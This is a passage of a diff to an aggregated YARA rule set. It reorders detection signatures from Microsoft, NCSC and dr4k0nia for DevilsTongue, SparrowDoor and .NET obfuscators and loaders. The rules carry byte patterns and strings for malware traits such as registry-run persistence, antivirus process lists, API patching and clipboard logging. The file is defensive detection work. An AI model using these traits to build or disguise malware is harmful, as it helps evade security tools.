+		modified = "2022-07-07"
+		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Microsoft/DevilsTongue_HijackDll.yar#L2-L45"
+		license_url = "N/A"
+		logic_hash = "d1c01df74a00672bb8229d5433314d7cfa49ab22565e6cf78a4b6b2884dbd299"
+		score = 75
+		quality = 80
+		tags = "FILE"
+
+	strings:
+		$str1 = "windows.old\\windows" wide
+		$str2 = "NtQueryInformationThread"
+		$str3 = "dbgHelp.dll" wide
+		$str4 = "StackWalk64"
+		$str5 = "ConvertSidToStringSidW"
+		$str6 = "S-1-5-18" wide
+		$str7 = "SMNew.dll"
+		$code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
+		$code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
+
+	condition:
+		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or ( pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" ) )
+}
 rule MICROSOFT_Trojan_Win32_Plasrv : PLATINUM
 {
 	meta:
@@ -162163,42 +162784,11 @@ rule MICROSOFT_Trojan_Win32_Plakpeer : PLATINUM
 	condition:
 		$str1 and $str2 and $str3 and $str4
 }
-
-rule MICROSOFT_Devilstongue_Hijackdll : FILE
-{
-	meta:
-		description = "Detects SOURGUM's DevilsTongue hijack DLL"
-		author = "Microsoft Threat Intelligence Center (MSTIC)"
-		id = "b5de2a8c-e0c8-5c8c-bb65-aee5701b4bb3"
-		date = "2021-07-15"
-		modified = "2022-07-07"
-		reference = "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/Microsoft/DevilsTongue_HijackDll.yar#L2-L45"
-		license_url = "N/A"
-		logic_hash = "d1c01df74a00672bb8229d5433314d7cfa49ab22565e6cf78a4b6b2884dbd299"
-		score = 75
-		quality = 80
-		tags = "FILE"
-
-	strings:
-		$str1 = "windows.old\\windows" wide
-		$str2 = "NtQueryInformationThread"
-		$str3 = "dbgHelp.dll" wide
-		$str4 = "StackWalk64"
-		$str5 = "ConvertSidToStringSidW"
-		$str6 = "S-1-5-18" wide
-		$str7 = "SMNew.dll"
-		$code1 = {B8 FF 15 00 00 66 39 41 FA 74 06 80 79 FB E8}
-		$code2 = {44 8B C0 B8 B5 81 4E 1B 41 F7 E8 C1 FA 05 8B CA C1 E9 1F 03 D1 69 CA 2C 01 00 00 44 2B C1 45 85 C0 7E 19}
-
-	condition:
-		filesize < 800KB and uint16( 0 ) == 0x5A4D and ( pe.characteristics & pe.DLL ) and ( 4 of them or ( $code1 and $code2 ) or ( pe.imphash ( ) == "9a964e810949704ff7b4a393d9adda60" ) )
-}
 /*
  * YARA Rule Set
  * Repository Name: NCSC
  * Repository: https://github.com/mikesxrs/Open-Source-YARA-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ec0056f767db98bf6d5fd63877ad51fb54d350e9
  * Number of Rules: 17
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -162208,128 +162798,127 @@ rule MICROSOFT_Devilstongue_Hijackdll : FILE
  *
  * NO LICENSE SET
  */
-rule NCSC_Sparrowdoor_Shellcode
+rule NCSC_Sparrowdoor_Sleep_Routine
 {
 	meta:
-		description = "Targets code features of the reflective loader for SparrowDoor. Targeting in memory."
+		description = "SparrowDoor implements a Sleep routine with value seeded on GetTickCount. This signature detects the previous and this variant of SparrowDoor. No MZ/PE match as the backdoor has no header."
 		author = "NCSC"
-		id = "572187fb-1a11-54f2-9fe7-2b7468b56556"
+		id = "9a0aa77d-7dbe-5007-b875-211cf528614b"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_shellcode.yar#L1-L15"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_sleep_routine.yar#L1-L12"
 		license_url = "N/A"
-		logic_hash = "7186bab23114b4825161f58fb02ff397ec8278385482232a4086c86c6fc47082"
+		logic_hash = "8ae231cb43440e1771d9f7ecaccfedae33f4d14e5ebabd94a909e05bd9fe1bc1"
 		score = 75
 		quality = 80
 		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$peb = {8B 48 08 89 4D FC 8B 51 3C 8B 54 0A 78 8B 74 0A 20 03 D1 03 F1 B3 64}
-		$getp_match = {8B 06 03 C1 80 38 47 75 34 80 78 01 65 75 2E 80 78 02 74 75 28 80 78 03 50 75 22 80 78 04 72 75 1C 80 78 06 63 75 16 80 78 05 6F 75 10 80 78 07 41 75 0A}
-		$k_check = {8B 48 20 8A 09 80 F9 6B 74 05 80 F9 4B 75 05}
-		$resolve_load_lib = {C7 45 C4 4C 6F 61 64 C7 45 C8 4C 69 62 72 C7 45 CC 61 72 79 41 C7 45 D0 00 00 00 00 FF 75 FC FF 55 E4}
+		$sleep = {FF D7 33 D2 B9 [4] F7 F1 81 C2 [4] 8B C2 C1 E0 04 2B C2 03 C0 03 C0 03 C0 50}
 
 	condition:
-		3 of them
+		all of them
 }
-rule NCSC_Sparrowdoor_Apipatch
+
+rule NCSC_Sparrowdoor_Clipshot : FILE
 {
 	meta:
-		description = "Identifies code segments in SparrowDoor responsible for patching APIs. No MZ/PE match as the backdoor has no header. Targeting in memory."
+		description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file."
 		author = "NCSC"
-		id = "119b7f3a-1850-53ab-a5d1-8882e34a34b4"
+		id = "186e694b-6ae1-5042-847a-f54708dc76ef"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_apipatch.yar#L1-L17"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20"
 		license_url = "N/A"
-		logic_hash = "302ad7fc0354636c57e6ec86876c7d4a5baaa784f5ecf0f2d51ce47631b8542a"
+		logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae"
 		score = 75
 		quality = 80
-		tags = ""
-		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
+		tags = "FILE"
+		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
 
 	strings:
-		$save = {8B 06 89 07 8A 4E 04}
-		$vp_1 = {89 10 8A 4E 04 8B D6 2B D0 88 48 04 83 EA 05 C6 40 05 E9 89 50 06}
-		$vp_2 = {50 8B D6 6A 40 2B D7 88 4F 04 83 EA 05 6A 05 C6 47 05 E9 89 57 06 56}
-		$vp_3 = {51 52 2B DE 6A 05 83 EB 05 56 C6 06 E9 89 5E 01}
-		$va = {6A 40 68 00 10 00 00 68 00 10 00 00 6A 00}
-		$s_patch = {50 68 7F FF FF FF 68 FF FF 00 00 56}
+		$exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04}
+		$time_format_string = "%d/%d/%d %d:%d" ascii
+		$cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52}
 
 	condition:
-		3 of them
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them and ( pe.imports ( "User32.dll" , "OpenClipboard" ) and pe.imports ( "User32.dll" , "GetClipboardData" ) and pe.imports ( "Kernel32.dll" , "GetLocalTime" ) and pe.imports ( "Kernel32.dll" , "GlobalSize" ) )
 }
-rule NCSC_Sparrowdoor_Config : FILE
+rule NCSC_Sparrowdoor_Xor
 {
 	meta:
-		description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key."
+		description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory."
 		author = "NCSC"
-		id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd"
+		id = "9c07feea-91fc-528e-91ac-14d09fa1fc10"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509"
+		logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
+	strings:
+		$xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE}
+		$xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2}
+		$xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05}
+
 	condition:
-		( uint16( 0 ) != 0x5A4D ) and ( uint16( 0 ) != 0x8b55 ) and ( uint32( 0 ) ^ uint32( 0x4c ) == 0x00 ) and ( uint32( 0 ) ^ uint32( 0x34 ) == 0x00 ) and ( uint16( 0 ) ^ uint16( 0x50 ) == 0x8b55 )
+		2 of them
 }
-rule NCSC_Sparrowdoor_Sleep_Routine
+rule NCSC_Sparrowdoor_Apipatch
 {
 	meta:
-		description = "SparrowDoor implements a Sleep routine with value seeded on GetTickCount. This signature detects the previous and this variant of SparrowDoor. No MZ/PE match as the backdoor has no header."
+		description = "Identifies code segments in SparrowDoor responsible for patching APIs. No MZ/PE match as the backdoor has no header. Targeting in memory."
 		author = "NCSC"
-		id = "9a0aa77d-7dbe-5007-b875-211cf528614b"
+		id = "119b7f3a-1850-53ab-a5d1-8882e34a34b4"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_sleep_routine.yar#L1-L12"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_apipatch.yar#L1-L17"
 		license_url = "N/A"
-		logic_hash = "8ae231cb43440e1771d9f7ecaccfedae33f4d14e5ebabd94a909e05bd9fe1bc1"
+		logic_hash = "302ad7fc0354636c57e6ec86876c7d4a5baaa784f5ecf0f2d51ce47631b8542a"
 		score = 75
 		quality = 80
 		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$sleep = {FF D7 33 D2 B9 [4] F7 F1 81 C2 [4] 8B C2 C1 E0 04 2B C2 03 C0 03 C0 03 C0 50}
+		$save = {8B 06 89 07 8A 4E 04}
+		$vp_1 = {89 10 8A 4E 04 8B D6 2B D0 88 48 04 83 EA 05 C6 40 05 E9 89 50 06}
+		$vp_2 = {50 8B D6 6A 40 2B D7 88 4F 04 83 EA 05 6A 05 C6 47 05 E9 89 57 06 56}
+		$vp_3 = {51 52 2B DE 6A 05 83 EB 05 56 C6 06 E9 89 5E 01}
+		$va = {6A 40 68 00 10 00 00 68 00 10 00 00 6A 00}
+		$s_patch = {50 68 7F FF FF FF 68 FF FF 00 00 56}
 
 	condition:
-		all of them
+		3 of them
 }
-
-rule NCSC_Sparrowdoor_Clipshot : FILE
+rule NCSC_Sparrowdoor_Config : FILE
 {
 	meta:
-		description = "The SparrowDoor loader contains a feature it calls clipshot, which logs clipboard data to a file."
+		description = "Targets the XOR encoded loader config and shellcode in the file libhost.dll using the known position of the XOR key."
 		author = "NCSC"
-		id = "186e694b-6ae1-5042-847a-f54708dc76ef"
+		id = "16eec5b6-c77a-585d-88f3-2c86abdbf2bd"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_clipshot.yar#L3-L20"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_config.yar#L1-L14"
 		license_url = "N/A"
-		logic_hash = "7662e3be2752ac82d6cfe4b2e420157e78367c201c25ae34b5d956dc53ba20ae"
+		logic_hash = "bd52496b6e7cabc875a277ce7d49f6b891c3f61591edef295dbee43716c15509"
 		score = 75
 		quality = 80
 		tags = "FILE"
-		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
-
-	strings:
-		$exsting_cmp = {8B 1E 3B 19 75 ?? 83 E8 04 83 C1 04 83 C6 04 83 F8 04}
-		$time_format_string = "%d/%d/%d %d:%d" ascii
-		$cre_fil_args = {6A 00 68 80 00 00 00 6A 04 6A 00 6A 02 68 00 00 00 40 52}
+		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them and ( pe.imports ( "User32.dll" , "OpenClipboard" ) and pe.imports ( "User32.dll" , "GetClipboardData" ) and pe.imports ( "Kernel32.dll" , "GetLocalTime" ) and pe.imports ( "Kernel32.dll" , "GlobalSize" ) )
+		( uint16( 0 ) != 0x5A4D ) and ( uint16( 0 ) != 0x8b55 ) and ( uint32( 0 ) ^ uint32( 0x4c ) == 0x00 ) and ( uint32( 0 ) ^ uint32( 0x34 ) == 0x00 ) and ( uint16( 0 ) ^ uint16( 0x50 ) == 0x8b55 )
 }
 rule NCSC_Neuron_Common_Strings : FILE
 {
@@ -162580,95 +163169,96 @@ rule NCSC_Neuron2_Dotnet_Strings : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint16( uint32( 0x3c ) ) == 0x4550 ) and $dotnetMagic and 2 of ( $s* )
 }
-rule NCSC_Sparrowdoor_Strings
+rule NCSC_Sparrowdoor_Loader : FILE
 {
 	meta:
-		description = "Strings that appear in SparrowDoor’s backdoor. Targeting in memory."
+		description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant."
 		author = "NCSC"
-		id = "6f96a577-fb59-57db-a66a-f514ecfbf982"
+		id = "7107cb82-c4c9-503f-b006-baec6b667498"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_strings.yar#L1-L23"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "65ec5d266ecd81ab8e4cfbcb352173f825bdae92fd4737b577cb209bace2a943"
+		logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4"
 		score = 75
 		quality = 80
-		tags = ""
-		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
+		tags = "FILE"
+		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
 
 	strings:
-		$reg = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
-		$http_headers = {55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 30 29 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 55 53 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A}
-		$http_proxy = "HTTPS=HTTPS://%s:%d" ascii
-		$debug = "SeDebugPrivilege" ascii
-		$av1 = "avp.exe" ascii
-		$av2 = "ZhuDongFangYu.exe" ascii
-		$av3 = "egui.exe" ascii
-		$av4 = "TMBMSRV.exe" ascii
-		$av5 = "ccSetMgr.exe" ascii
-		$clipshot = "clipshot" ascii
-		$ComSpec = "ComSpec" ascii
-		$export = "curl_easy_init" ascii
+		$xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1}
+		$rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56}
+		$lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56}
 
 	condition:
-		10 of them
+		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
 }
-rule NCSC_Sparrowdoor_Loader : FILE
+rule NCSC_Sparrowdoor_Shellcode
 {
 	meta:
-		description = "Targets code features of the SparrowDoor loader. This rule detects the previous variant and this new variant."
+		description = "Targets code features of the reflective loader for SparrowDoor. Targeting in memory."
 		author = "NCSC"
-		id = "7107cb82-c4c9-503f-b006-baec6b667498"
+		id = "572187fb-1a11-54f2-9fe7-2b7468b56556"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_loader.yar#L1-L15"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_shellcode.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "fa1bd386114d912722a5101a0112355dec654e2e9446c885c12946c7fae1c8f4"
+		logic_hash = "7186bab23114b4825161f58fb02ff397ec8278385482232a4086c86c6fc47082"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		hash1 = "989b3798841d06e286eb083132242749c80fdd4d"
+		tags = ""
+		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$xor_algo = {8B D0 83 E2 03 8A 54 14 10 30 14 30 40 3B C1}
-		$rva = {8D B0 [4] 8D 44 24 ?? 50 6A 40 6A 05 56}
-		$lj = {2B CE 83 E9 05 8D [3] 52 C6 06 E9 89 4E 01 8B [3] 50 6A 05 56}
+		$peb = {8B 48 08 89 4D FC 8B 51 3C 8B 54 0A 78 8B 74 0A 20 03 D1 03 F1 B3 64}
+		$getp_match = {8B 06 03 C1 80 38 47 75 34 80 78 01 65 75 2E 80 78 02 74 75 28 80 78 03 50 75 22 80 78 04 72 75 1C 80 78 06 63 75 16 80 78 05 6F 75 10 80 78 07 41 75 0A}
+		$k_check = {8B 48 20 8A 09 80 F9 6B 74 05 80 F9 4B 75 05}
+		$resolve_load_lib = {C7 45 C4 4C 6F 61 64 C7 45 C8 4C 69 62 72 C7 45 CC 61 72 79 41 C7 45 D0 00 00 00 00 FF 75 FC FF 55 E4}
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and uint32( uint32( 0x3C ) ) == 0x00004550 and all of them
+		3 of them
 }
-rule NCSC_Sparrowdoor_Xor
+rule NCSC_Sparrowdoor_Strings
 {
 	meta:
-		description = "Highlights XOR routines in SparrowDoor. No MZ/PE match as the backdoor has no header. Targeting in memory."
+		description = "Strings that appear in SparrowDoor’s backdoor. Targeting in memory."
 		author = "NCSC"
-		id = "9c07feea-91fc-528e-91ac-14d09fa1fc10"
+		id = "6f96a577-fb59-57db-a66a-f514ecfbf982"
 		date = "2022-02-28"
 		modified = "2022-07-06"
 		reference = "https://www.ncsc.gov.uk/files/NCSC-MAR-SparrowDoor.pdf"
-		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_xor.yar#L1-L14"
+		source_url = "https://github.com/mikesxrs/Open-Source-YARA-rules/blob/ec0056f767db98bf6d5fd63877ad51fb54d350e9/NCSC/SparrowDoor_strings.yar#L1-L23"
 		license_url = "N/A"
-		logic_hash = "3244e9017e5a0bf1c54e03b3191a5c695b2c1586b3ed4c529742f9b48903a348"
+		logic_hash = "65ec5d266ecd81ab8e4cfbcb352173f825bdae92fd4737b577cb209bace2a943"
 		score = 75
 		quality = 80
 		tags = ""
 		hash1 = "c1890a6447c991880467b86a013dbeaa66cc615f"
 
 	strings:
-		$xor_routine_outbound = {B8 39 8E E3 38 F7 E1 D1 EA 8D 14 D2 8B C1 2B C2 8A [4] 00 30 14 39 41 3B CE}
-		$xor_routine_inbound = {B8 25 49 92 24 F7 E1 8B C1 2B C2 D1 E8 03 C2 C1 E8 02 8D 14 C5 [4] 2B D0 8B C1 2B C2}
-		$xor_routine_config = {8B D9 83 E3 07 0F [6] 30 18 8D 1C 07 83 E3 07 0F [6] 30 58 01 8D 1C 28 83 E3 07 0F [6] 30 58 02 8D 1C 02 83 E3 07 0F [6] 30 58 03 8B DE 83 E3 07 0F [6] 30 58 04 83 C6 05 83 C1 05}
+		$reg = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii
+		$http_headers = {55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 35 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 30 29 0D 0A 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A 20 65 6E 2D 55 53 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A}
+		$http_proxy = "HTTPS=HTTPS://%s:%d" ascii
+		$debug = "SeDebugPrivilege" ascii
+		$av1 = "avp.exe" ascii
+		$av2 = "ZhuDongFangYu.exe" ascii
+		$av3 = "egui.exe" ascii
+		$av4 = "TMBMSRV.exe" ascii
+		$av5 = "ccSetMgr.exe" ascii
+		$clipshot = "clipshot" ascii
+		$ComSpec = "ComSpec" ascii
+		$export = "curl_easy_init" ascii
 
 	condition:
-		2 of them
+		10 of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Dr4k0nia
  * Repository: https://github.com/dr4k0nia/yara-rules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8
  * Number of Rules: 5
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -162696,55 +163286,67 @@ THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED
 
  */
 
-rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE
+rule DR4K0NIA_Msil_Susp_Obf_Antidump : FILE
 {
 	meta:
-		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
+		description = "No description has been set in the source file - Dr4k0nia"
 		author = "dr4k0nia"
-		id = "0bea654d-9244-5320-a815-691384decc74"
-		date = "2023-03-26"
-		modified = "2023-03-26"
+		id = "d9217ade-a016-548e-b63f-f6ee78ff8775"
+		date = "2023-12-03"
+		modified = "2023-03-13"
 		reference = "https://github.com/dr4k0nia/yara-rules"
-		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_xorstringsnet.yar#L3-L16"
+		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_antidump.yar#L7-L39"
 		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
-		logic_hash = "c494b5b64bcb63d1edd611206fb41eb9a23a940a72c3e9fc3f626e91482b1352"
+		hash = "ef7bb2464a2b430aa98bd65a1a40b851b57cb909ac0aea3e53729c0ff900fa42"
+		logic_hash = "18cfc720f54b2178398f8214591a3fb777ea11e67a8a6d2ce26cc4891a62fd35"
 		score = 65
 		quality = 85
 		tags = "FILE"
 		version = "1.0"
 
 	strings:
-		$pattern = { 06 1E 58 07 8E 69 FE17 }
+		$import0 = "ZeroMemory"
+		$import1 = "VirtualProtect"
+		$importt2 = "GetCurrentProcess"
+		$array0 = {08 00 00 00 0c 00 00 00 10 00 00 00 14 00 00 00
+		18 00 00 00 1c 00 00 00 24 00 00 00}
+		$array1 = {04 00 00 00 16 00 00 00 18 00 00 00 40 00 00 00
+		42 00 00 00 44 00 00 00 46 00 00 00 48 00 00 00
+		4a 00 00 00 4c 00 00 00 5c 00 00 00 5e 00 00 00}
+		$array2 = {00 00 00 00 08 00 00 00 0c 00 00 00 10 00 00 00
+		16 00 00 00 1c 00 00 00 20 00 00 00 28 00 00 00
+		2c 00 00 00 34 00 00 00 3c 00 00 00 4c 00 00 00
+		50 00 00 00 54 00 00 00 58 00 00 00 60 00 00 00
+		64 00 00 00 68 00 00 00 6c 00 00 00 70 00 00 00
+		74 00 00 00 04 01 00 00 08 01 00 00 0c 01 00 00
+		10 01 00 00 14 01 00 00 1c 01 00 00}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 25MB and dotnet.is_dotnet and $pattern
+		uint16( 0 ) == 0x5a4d and dotnet.is_dotnet and all of them
 }
-rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE
+
+rule DR4K0NIA_Msil_Susp_Obf_Xorstringsnet : FILE
 {
 	meta:
-		description = "Detects NixImports .NET loader"
+		description = "Detects XorStringsNET string encryption, and other obfuscators derived from it"
 		author = "dr4k0nia"
-		id = "ba0d072d-674a-5790-9381-4dac98204268"
-		date = "2023-05-21"
-		modified = "2023-05-22"
-		reference = "https://github.com/dr4k0nia/NixImports"
-		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_mal_niximports_loader.yar#L1-L21"
+		id = "0bea654d-9244-5320-a815-691384decc74"
+		date = "2023-03-26"
+		modified = "2023-03-26"
+		reference = "https://github.com/dr4k0nia/yara-rules"
+		source_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/dotnet/msil_susp_obf_xorstringsnet.yar#L3-L16"
 		license_url = "https://github.com/dr4k0nia/yara-rules/blob/4b10f9b79a4cfb3ec9cb5675f32cc7ee6885fbd8/LICENSE.md"
-		logic_hash = "79421b2677705852f893fa53478deb2e4aa8bd354ac05cbf5438a3a2a15d70bf"
-		score = 75
+		logic_hash = "c494b5b64bcb63d1edd611206fb41eb9a23a940a72c3e9fc3f626e91482b1352"
+		score = 65
 		quality = 85
 		tags = "FILE"
+		version = "1.0"
 
 	strings:
-		$op_pe = {C2 95 C2 97 C2 B2 C2 92 C2 82 C2 82 C2 8E C2 82 C2 82 C2 82 C2 82 C2 86 C2 82}
-		$op_delegate = {20 F0 C7 FF 80 20 83 BF 7F 1F 14 14}
-		$a1 = "GetRuntimeProperties" ascii fullword
-		$a2 = "GetTypes" ascii fullword
-		$a3 = "GetRuntimeMethods" ascii fullword
-		$a4 = "netstandard" ascii fullword
+		$pattern = { 06 1E 58 07 8E 69 FE17 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3MB and all of ( $a* ) and 2 of ( $op* )
+		uint16( 0 ) == 0x5a4d and filesize < 25MB and dotnet.is_dotnet and $pattern
 }
 rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE
 {
@@ -162776,6 +163378,33 @@ rule DR4K0NIA_MAL_MSIL_NET_Typhonlogger_Jul23 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and ( $sx or ( all of ( $sa* ) and 2 of ( $op* ) ) )
 }
+rule DR4K0NIA_MAL_Msil_Net_Niximports_Loader : FILE
+{
+	meta:
+		description = "Detects NixImports .NET loader"
+		author = "dr4k0nia"
+		id = "ba0d072d-674a-5790-9381-4dac98204268"
+		date = "2023-05-21"
+		modified = "2023-05-22"
+		reference = "https://github.com/dr4k0nia/NixImports"
